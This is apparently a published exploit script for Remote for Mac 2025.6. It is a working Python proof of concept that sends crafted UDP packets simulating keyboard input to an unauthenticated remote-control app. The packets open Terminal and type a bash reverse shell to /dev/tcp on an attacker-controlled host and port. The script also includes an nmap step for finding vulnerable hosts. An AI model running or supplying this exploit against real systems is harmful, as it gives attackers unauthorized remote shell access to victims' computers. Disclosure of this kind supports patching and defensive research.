# Exploit Title: Remote for Mac 2025.6 - Remote Code Execution (RCE) # Date: 2025-05-27 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://cherpake.com/ # Software Link: https://cherpake.com/latest.php?os=mac # Version: 2025.6 # Tested on: macOS Mojave 10.14.6 #!/usr/bin/env python3 ''' The vulnerability in Remote for Mac 2025.6 allows an unauthenticated remote attacker to achieve Remote Code Execution (RCE) by sending a crafted sequence of UDP packets that simulate keyboard input. - Works when "Allow unknown devices" setting is enabled (default: disabled) # Identification: nmap -p- -T4 --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer ''' import socket from time import sleep target_ip = "192.168.8.102" target_port = 49229 lhost = "192.168.8.100" lport = "4444" initial_packets_hex = [ "07000200370001", # press ⌘ (Command key) "07000200370001", "060003002000", # space "07000200370000", "07000200370000" # release ⌘ ] final_packets_hex = [ "07000200240001", "07000200240000" ] sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) print("Starting exploit..") for i, hex_packet in enumerate(initial_packets_hex): packet = bytes.fromhex(hex_packet) sock.sendto(packet, (target_ip, target_port)) sleep(1) prefix = bytes.fromhex("06000300") text = "terminal" for i, ch in enumerate(text): ch_utf16le = ch.encode("utf-16le") packet = prefix + ch_utf16le sock.sendto(packet, (target_ip, target_port)) sleep(2) for i, hex_packet in enumerate(final_packets_hex): packet = bytes.fromhex(hex_packet) sock.sendto(packet, (target_ip, target_port)) sleep(2) payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1" print(f"Typing the reverse shell payload..") for i, ch in enumerate(payload): ch_utf16le = ch.encode("utf-16le") packet = prefix + ch_utf16le sock.sendto(packet, (target_ip, target_port)) sleep(2) print("Executing payload..") for i, hex_packet in enumerate(final_packets_hex): packet = bytes.fromhex(hex_packet) sock.sendto(packet, (target_ip, target_port)) sleep(2) print("Exploit completed.") sock.close()